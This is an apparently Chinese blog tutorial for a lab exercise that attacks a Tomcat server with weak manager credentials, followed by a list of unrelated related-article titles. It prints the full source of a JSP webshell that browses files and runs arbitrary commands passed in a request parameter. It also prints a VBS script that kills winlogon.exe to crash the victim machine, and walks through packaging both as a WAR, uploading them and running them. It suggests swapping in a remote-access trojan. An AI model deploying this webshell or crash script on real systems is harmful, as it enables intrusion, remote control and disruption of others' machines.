服务器弱口令修改,Tomcat服务器弱口令漏洞攻击实验
1、在XP系统上搭建Tomcat服务器平台;
2、在另一台虚拟机上利用弱口令漏洞上传木马程序,使得XP系统中木马。
实验步骤
一、搭建Tomcat服务器平台
1.安装JAVAJDK
环境变量的配置:(这里我的JAVA是按照默认安装地址安装的)
JAVA_HOME:C:\Program Files\Java\jdk1.7.0_79
Path:%JAVA_HOME%\bin
CLASSPATH:.%JAVA_HOME%\lib\dt.jar;%JAVA_HOME%\lib\tool.jar
Cmd输入命令查看
输入:java –version,检查是否安装成功。
1.png (43.07 KB, 下载次数: 0)
2021-4-28 21:07 上传
输入:javac,检查环境变量配置是否成功。
2.png (52.02 KB, 下载次数: 0)
2021-4-28 21:08 上传
2.安装Apache-Tomcat服务器
将压缩包解压,把整个文件夹拷贝至C盘。(免安装)
添加环境变量:
TOMCAT_HOME:C:\apache-tomcat-6.0.37
进入bin目录,点击startup.bat或者shutdown.bat可以启动或关闭服务器。
若测试不成功,则需添加完整的环境变量。(可选不是必选)
3.png (95.72 KB, 下载次数: 0)
2021-4-28 21:08 上传
点击startup.exe,启动服务器,在浏览器中输入:http://127.0.0.1:8080/,若显示如下界面,则服务器启动成功。
4.png (186.54 KB, 下载次数: 0)
2021-4-28 21:08 上传
二、登录管理员后台
登录管理员后台需要用户名密码,刚开始未设置,我们要自行设置。
5.png (112.93 KB, 下载次数: 1)
2021-4-28 21:08 上传
首先查看存放用户名密码的文件:在conf文件夹下的tomcat-users.xml,用记事本打开。将管理员账号添加进去:
其中各个rolename的含义:
6.png (25.94 KB, 下载次数: 1)
2021-4-28 21:08 上传
点击保存后重启服务器,回到登录界面,输入用户名密码,即可进入管理员界面:
7.png (76.33 KB, 下载次数: 1)
2021-4-28 21:08 上传
三、木马制作
Tomcat只支持war的后缀文件包的上传,因此,必须将jsp木马程序与其他木马一起打包成war包才能上传。
在安装有JDK的操作系统上,将所需要上传的木马放在同一个文件夹中,存放到C盘。
这里用到一个s.jsp的木马程序以及V.vbs病毒程序。
这里s.jsp的代码:
[AppleScript] 纯文本查看 复制代码
td,select,input,body
{
font-size:9pt;
}
A { TEXT-DECORATION: none }
Jsp File Manger Version0.5 --bY 慈勤强 [email]cqq1978@Gmail.com[/email]
String getDrivers()
/**
Windows系统上取得可用的所有逻辑盘
**/
{
StringBuffer sb=new StringBuffer("驱动器 : ");
File roots[]=File.listRoots();
for(int i=0;i
{
sb.append("");
sb.append(roots[i]+" ");
}
return sb.toString();
}
%>
String strThisFile="folder.jsp";
request.setCharacterEncoding("gb2312");
String strDir = request.getParameter("path");
if(strDir==null||strDir.length()<1)
{
strDir = "c:\\";
}
StringBuffer sb=new StringBuffer("");
StringBuffer sbFile=new StringBuffer("");
try
{
out.println("
当前目录: "+strDir+" | " + getDrivers() + " |
\r\n");
File objFile = new File(strDir);
File list[] = objFile.listFiles();
if(objFile.getAbsolutePath().length()>3)
{
sb.append("
");
sb.append("上级目录
- - - - - - - - - - - \r\n");
}
for(int i=0;i
{
if(list[i].isDirectory())
{
sb.append("
");
sb.append(""+list[i].getName()+"");
sb.append("
");
//sb.append("\r\n");
}
else
{
String strLen="";
String strDT="";
long lFile=0;
lFile=list[i].length();
if(lFile>1000000)
{
lFile=lFile/1000000;
strLen="" + lFile + " M";
}
else if(lFile>1000)
{
lFile=lFile/1000;
strLen="" + lFile + " K";
}
else
{
strLen="" + lFile + " Byte";
}
Date dt=new Date(list[i].lastModified());
strDT=dt.toLocaleString();
sbFile.append("
");
sbFile.append(""+list[i].getName());
sbFile.append("
");
sbFile.append(""+strLen);
sbFile.append("
");
sbFile.append(""+strDT);
sbFile.append("
");
sbFile.append(" ");
sbFile.append("
\r\n");
//sbFile.append("");
}
}
//out.println(sb.toString()+sbFile.toString());
}
catch(Exception e)
{
out.println("操作失败: "+e.toString()+"");
}
%>
|
String strCmd="";
String line="";
StringBuffer sbCmd=new StringBuffer("");
strCmd = request.getParameter("cmd");
if(strCmd!=null)
{
try
{
//out.println(strCmd);
Process p=Runtime.getRuntime().exec("cmd /c "+strCmd);
BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));
while((line=br.readLine())!=null)
{
sbCmd.append(line+"\r\n");
}
}
catch(Exception e)
{
System.out.println(e.toString());
}
}
%>
if(sbCmd!=null && sbCmd.toString().trim().equals("")==false)
{
%>
}
%>
这里V.vbs的代码:
[AppleScript] 纯文本查看 复制代码if MsgBox("你是在上网络信息安全的课吗?",vbYesNo,"提示")=vbyes then
msgbox "你真是在上网络安全课啊,这么好丫!"
else
msgbox "还不承认? 作为惩罚,折腾你一下",64,"严重警告!!!!!!"
Set ws = CreateObject("Wscript.Shell")
wscript.sleep 1200
ws.run "cmd /c start /min ntsd -c q -pn winlogon.exe 1>nul 2>nul",vbhide
end if
运行cmd,使用cd命令将目录切换到刚刚存放的c文件夹下:
8.png (38.04 KB, 下载次数: 1)
2021-4-28 21:08 上传
使用命令将木马程序打包:
jar cvf shell.war *
若提示jar不是内部命令,请回到JDK安装步骤查看环境变量是否配置正确。
成功时的命令提示如下:
9.png (66.95 KB, 下载次数: 1)
2021-4-28 21:08 上传
四、漏洞入侵
访问目标网站
使用另一台电脑输入以下网址:
http://192.168.41.131:8080/(对应IP地址要改)
访问成功将出现以下界面:
10.png (117.38 KB, 下载次数: 0)
2021-4-28 21:08 上传
弱口令扫描
打开Apache Tomcat crack软件,界面如下:
11.png (51.57 KB, 下载次数: 0)
2021-4-28 21:08 上传
设置扫描网段,点击add按钮添加;点击start按钮开始扫描。扫描成功将获得口令和密码。
12.png (86.02 KB, 下载次数: 1)
2021-4-28 21:08 上传
上传木马
利用前面扫描到的口令密码登录管理员网页,将之前做好的war包上传至服务器:
13.png (33.68 KB, 下载次数: 0)
2021-4-28 21:08 上传
14.png (13.95 KB, 下载次数: 0)
2021-4-28 21:08 上传
查看木马
在地址栏中输入网址:
http://192.168.41.131:8080/shell/s.jsp
即可看到对方电脑中所有的文件目录:
15.png (68.21 KB, 下载次数: 0)
2021-4-28 21:08 上传
运行木马
找出之前一并上传的木马文件V.vbs,利用下面的执行功能让其在被害者电脑上运行:
c:\apache-tomcat-6.0.37\webapps\shell\V.vbs -install
16.png (69.22 KB, 下载次数: 0)
2021-4-28 21:08 上传
此时在被攻击者电脑上会自运行病毒程序,即中病毒了。也可将病毒用灰鸽子木马替换实现远程控制。
17.png (34.82 KB, 下载次数: 0)
2021-4-28 21:08 上传
18.png (35.01 KB, 下载次数: 0)
2021-4-28 21:08 上传
点击“否”的话要小心哦,因为电脑会变成“蓝屏”,不过不用怕,其实就蓝屏一会儿就帮你重启啦~不相信可以返回去看V.vbs的代码哦~
服务器弱口令修改,Tomcat服务器弱口令漏洞攻击实验相关推荐
- 修改Tomcat服务器启动图标
文章目录 修改Tomcat服务器启动图标 推荐文章 第一步:预览 第二步:修改 修改Tomcat服务器启动图标 推荐文章 Tomcat服务器下载.安装.配置环境变量教程(超详细) https://bl ...
- 如何Linux系统中修改Tomcat服务器的端口号【详细教程】
Tomcat服务器的端口号位置 --> (server.xml )配置文件 步骤一:进入编辑 ( server.xml )文件 方式一:从根目录直接进入 ( server.xml )修改端 ...
- 修改TOMCAT服务器图标为应用LOGO
在tomcat下部署应用程序,运行后,发现在地址栏中会显示tomcat的小猫咪图标.有时候,我们自己不想显示这个图标,想换成自己定义的的图标,那么按如下方法操作即可: 参考网上的解决方案: 1.将$T ...
- 利用memcached做缓存服务器,为后端tomcat服务器做会话保持,利用httpd的jk模块模块做负载均衡...
前端使用httpd作为反代负载均衡至后端tomcat主机:tomcat可用memcached当做会话服务器保存会话: 实验环境:物理机win7,虚拟机centos7 node1:172.18.11.1 ...
- tomcat服务器运行环境,win7怎么配置Tomcat服务器环境|win7系统配置Tomcat服务器环境的方法...
许多用户询问说win7旗舰版系统怎么配置Tomcat服务器环境?tomcat是什么?它一款轻量级免费开源的Web服务器,我们再使用tomcat时,最好配置一下环境变量.很多新手用户不知道怎么配置 ...
- 云服务器端口管理修改,云服务器端口管理修改
云服务器端口管理修改 内容精选 换一换 介绍使用同一VPC内弹性云服务器ECS上的Python客户端连接Memcached实例的方法.已成功申请Memcached实例,且状态为"运行中&qu ...
- 怎样修改t3服务器地址,怎样修改t3服务器地址
怎样修改t3服务器地址 内容精选 换一换 华为云帮助中心,为用户提供产品简介.价格说明.购买指南.用户指南.API参考.最佳实践.常见问题.视频帮助等技术文档,帮助您快速上手使用华为云服务. Atla ...
- 云服务器php版本修改,云服务器 更改php版本
云服务器 更改php版本 内容精选 换一换 本节操作介绍在管理控制台创建启动模板的操作步骤.每个账号在每个区域最多可创建30个启动模板.创建启动模板时,所有配置项均为可选.但如果缺失了创建实例的必要参 ...
- linux服务器虚拟内存设置,修改Linux服务器虚拟内存Swap大小
Linux的Swap相当于Windows的虚拟内存,当物理内存不够的时候,就需要将物理内存中的一部分空间释放出来,以供当前运行的程序使用. 那些被释放出来的空间可能来自一些很长时间没有什么操作的程序, ...
最新文章
- VS中dll以及lib生成路径设置
- 写一个简单的爬虫 - 如何模拟登录网站
- oracle中schema指的是什么?
- 先学c语言还是先学java_是先学 java好还是先学c语言好
- 05、ADS使用记录之集总参数匹配
- 论文Re-ranking Person Re-identification with k-reciprocal Encoding(person re-id的re-ranking)
- 字节和兆字节的换算_什么是兆字节(MB)?
- android隐藏关闭软键盘
- 从B树谈到R树之B树的c实现
- php 促成交易,促成交易的方法
- 403服务器显示什么意思,404、503、403、301状态码是什么意思?
- 解决ORA-01033: ORACLE initialization or shutdown in progress
- 软件测评师--第14小时 易用性测试
- ios作为pc摄像头,pc作为ios/另一pc摄像头
- linux quota 限制文件大小,quota命令_Linux quota 命令用法详解:显示磁盘已使用的空间与限制...
- 科佩克机器人TCP通信(机器人控制器作为服务器)
- 如何在vs中导入libjpeg_Qt简介以及如何配置Qt使用VS2010进行开发(转)
- 三菱Q系列QD77MS2定位模块使用
- win 11 kali 安装记录
- AI的不同发展方向汇总(人工智能)
热门文章
- VScode使用python的yapf库
- 1342. 断开的项链【难度: 一般 / 破环成链】
- 【PAT乙级】1060 爱丁顿数 (25 分)
- 给虚拟机中的linux系统增加一个硬盘
- 二叉查找树(二)之 C++的实现
- ajax csrf php,Laravel中Ajax调用时的CSRF对策
- Java面试2018常考题目汇总
- hibernate的3种继承映射关系总结——TPH,TPS,TPC
- mac+php7+mysql.so_在Mac上编译安装PHP7的开发环境
- java并发编程之Semaphore